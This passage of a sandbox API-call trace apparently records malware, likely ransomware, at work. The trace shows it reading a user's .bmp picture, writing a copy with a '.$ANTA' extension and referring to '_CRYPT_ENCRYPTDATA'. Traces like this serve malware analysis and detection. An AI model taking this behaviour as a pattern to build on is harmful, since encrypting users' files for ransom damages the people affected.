[0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0087.046] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0087.046] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0087.046] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0087.046] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0087.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0087.047] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\9tpncyb524p.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0087.047] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.047] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0087.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0087.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0087.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.047] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0087.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0087.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0087.048] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0087.048] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0087.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0087.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0087.127] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0087.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0087.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0087.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0087.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0087.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.128] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\9tpncyb524p.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0087.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0087.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.129] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0087.129] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0087.129] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0087.129] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0087.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0087.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0c020 [0087.132] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0087.132] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0xca29, lpOverlapped=0x0) returned 1 [0087.134] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0087.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca29) returned 0x4516010 [0087.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0c020 | out: hHeap=0x1780000) returned 1 [0087.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0087.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca29) returned 0x4522a48 [0087.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0087.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.137] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0087.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca29) returned 0x4516010 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.138] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0087.138] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.138] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: 